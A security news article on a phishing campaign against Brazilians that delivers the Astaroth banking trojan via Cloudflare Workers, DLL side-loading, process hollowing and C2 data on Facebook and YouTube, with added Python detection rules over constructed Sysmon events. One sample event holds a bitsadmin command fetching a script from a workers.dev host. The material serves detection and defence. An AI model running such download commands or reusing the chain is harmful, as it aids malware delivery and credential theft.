Facebook, YouTube used in Brazilian phishing scheme

News by Doug Olenick

A phishing campaign abuses Facebook, YouTube and Cloudflare Workers, a service run by a top-tier security vendor, alongside social engineering that convinces victims to open and download a malicious attachment

A cyber-criminal gang has put together a phishing campaign that abuses several trusted services, including Facebook, YouTube and Cloudflare Workers, a platform run by a top-tier security vendor, alongside social engineering that convinces its victims to open and download a malicious attachment.

Cofense Intelligence found the malicious actors, who are only targeting Brazilians, are extensively using trusted names, legitimate Windows binaries and Cloudflare Workers to deliver the Astaroth trojan with the aim of stealing banking credentials. However, despite the effort put forth by the gang, Cofense researchers said the attacks can be stopped if the proper precautions, both human and technical, are in place.

The current campaign is sending emails only in Portuguese, pretending to be an invoice, a show ticket or a civil lawsuit notice. In each case the body of the email is socially engineered to convince the recipient to open and then download the attached .htm file.

Once the .htm file is opened it fetches a .zip archive, geo-fenced to Brazil, containing a malicious .LNK file. The Cloudflare Workers abuse comes at the next step: the .LNK file downloads a JavaScript file hosted on a Cloudflare Workers account. This, in turn, downloads multiple files that help obfuscate and execute the Astaroth information stealer, including two .DLL files that are joined together and side-loaded into a legitimate program, ‘C:\Program Files\Internet Explorer\ExtExport.exe’, Cofense wrote.

Because these later-stage downloads come from a reputable hosting service and are executed through a legitimate Windows binary, they help the malware evade antivirus, application whitelisting and URL filtering.

The malware then uses process hollowing: it starts legitimate programs and replaces their in-memory code with the previously downloaded payload, so the malicious code runs under a trusted process name. The most important of these programs is unins000.exe, which is associated with the Brazilian banking system.

Astaroth then uses YouTube and Facebook profiles, normally trustworthy sites, to host and maintain its C2 configuration data.

"The data is within posts on Facebook or within the profile information of user accounts on YouTube. By hosting the C2 data within these trusted sources, the threat actors can bypass network security measures like content filtering. The threat actors are also able to dynamically change the content within these trusted sources so they can deter the possibility of their infrastructure being taken down," Cofense wrote.
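As an added example (not code from the Cofense report or from this article), the following Python runs simple detection rules over constructed Sysmon-style events covering the chain described above: the .LNK fetching a script from a *.workers.dev host (Cloudflare Workers' default domain), ExtExport.exe loading a DLL from outside its expected directories, ExtExport.exe spawning or opening a remote thread into another process such as unins000.exe, and a non-browser process contacting Facebook or YouTube for its C2 configuration. The events, hostnames, file paths, and the trusted-directory and browser allowlists are all constructed assumptions, not indicators taken from the report.

```python
"""Detection rules for the Astaroth delivery chain, run over constructed
Sysmon-style events. Example code added to this article; not from Cofense.
EventID 1 = ProcessCreate, 3 = NetworkConnect, 7 = ImageLoad,
EventID 8 = CreateRemoteThread."""
import re

# Constructed sample events (not real telemetry); field names follow Sysmon's.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
    # The user opens the .LNK: explorer.exe spawns a command that fetches the
    # next stage from a Cloudflare Workers (*.workers.dev) host (assumed URL).
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe /c bitsadmin /transfer u /download "
                    r"https://fatura-2019.example.workers.dev/s.js %TEMP%\s.js"},
    # ExtExport.exe loading a system DLL (benign) and a DLL from a user path.
    {"EventID": 7, "Image": r"C:\Program Files\Internet Explorer\ExtExport.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll"},
    {"EventID": 7, "Image": r"C:\Program Files\Internet Explorer\ExtExport.exe",
     "ImageLoaded": r"C:\Users\Public\Libraries\stage\loader.dll"},
    # Hollowing target spawned by, then written to by, ExtExport.exe.
    {"EventID": 1, "Image": r"C:\Users\Public\Libraries\stage\unins000.exe",
     "ParentImage": r"C:\Program Files\Internet Explorer\ExtExport.exe",
     "CommandLine": "unins000.exe"},
    {"EventID": 8, "SourceImage": r"C:\Program Files\Internet Explorer\ExtExport.exe",
     "TargetImage": r"C:\Users\Public\Libraries\stage\unins000.exe"},
    # C2 configuration fetch: a browser (benign) versus the hollowed process.
    {"EventID": 3, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "DestinationHostname": "www.facebook.com", "DestinationPort": 443},
    {"EventID": 3, "Image": r"C:\Users\Public\Libraries\stage\unins000.exe",
     "DestinationHostname": "www.youtube.com", "DestinationPort": 443},
]

WORKERS_URL = re.compile(r"https?://[\w.-]+\.workers\.dev/\S*", re.I)
EXTEXPORT = "c:\\program files\\internet explorer\\extexport.exe"
# Directories ExtExport.exe is expected to load DLLs from (assumed allowlist).
TRUSTED_DLL_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                    "c:\\windows\\winsxs\\", "c:\\program files\\internet explorer\\")
SOCIAL_HOSTS = ("facebook.com", "youtube.com")
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}  # assumed


def _low(path):
    return (path or "").lower()


def _base(path):
    return _low(path).rsplit("\\", 1)[-1]


def rule_workers_download(ev):
    """explorer.exe (a user opening the .LNK) spawning a command whose
    command line fetches from a *.workers.dev host."""
    if ev.get("EventID") != 1 or _base(ev.get("ParentImage")) != "explorer.exe":
        return None
    match = WORKERS_URL.search(ev.get("CommandLine", ""))
    return ("workers_download", match.group(0)) if match else None


def rule_extexport_sideload(ev):
    """ExtExport.exe loading a DLL from outside its trusted directories."""
    if ev.get("EventID") != 7 or _low(ev.get("Image")) != EXTEXPORT:
        return None
    if _low(ev.get("ImageLoaded")).startswith(TRUSTED_DLL_DIRS):
        return None
    return ("extexport_sideload", ev["ImageLoaded"])


def rule_hollowing(ev):
    """ExtExport.exe, treated here as a process that should neither spawn
    children nor thread into other processes, doing either. unins000.exe is
    the target the report singles out."""
    eid = ev.get("EventID")
    if eid == 1 and _low(ev.get("ParentImage")) == EXTEXPORT:
        return ("hollowing_spawn", _base(ev["Image"]))
    if eid == 8 and _low(ev.get("SourceImage")) == EXTEXPORT:
        return ("hollowing_remote_thread", _base(ev["TargetImage"]))
    return None


def rule_social_c2(ev):
    """A non-browser process contacting the sites Astaroth uses for C2 config."""
    if ev.get("EventID") != 3:
        return None
    host = _low(ev.get("DestinationHostname"))
    if not any(host == h or host.endswith("." + h) for h in SOCIAL_HOSTS):
        return None
    proc = _base(ev.get("Image"))
    if proc in BROWSERS:
        return None
    return ("social_c2_fetch", f"{proc} -> {host}")


RULES = (rule_workers_download, rule_extexport_sideload, rule_hollowing, rule_social_c2)


def detect(events):
    """Return (rule_name, detail) findings in event order."""
    findings = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for name, detail in detect(SAMPLE_EVENTS):
        print(f"{name}: {detail}")
```

Run stand-alone it prints one line per finding. The network rule in particular will fire on many legitimate non-browser applications, so in production it needs an allowlist tuned to the environment; correlating it with the earlier stages on the same host within a short time window is what turns these heuristics into a usable alert.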

At this point the information stealer goes to work and gathers financial data, passwords stored in the browser, email client credentials and SSH credentials.

"Astaroth’s complex infection chain targeting Brazilian citizens shows the value in layered defense as well as education of the end user. At each step, the security stack could have made an impact to stop the infection chain; however, through the use of legitimate processes and outside trusted sources, Astaroth was able to negate those defensive measures," Cofense concluded.

This article was originally published on SC Media US.
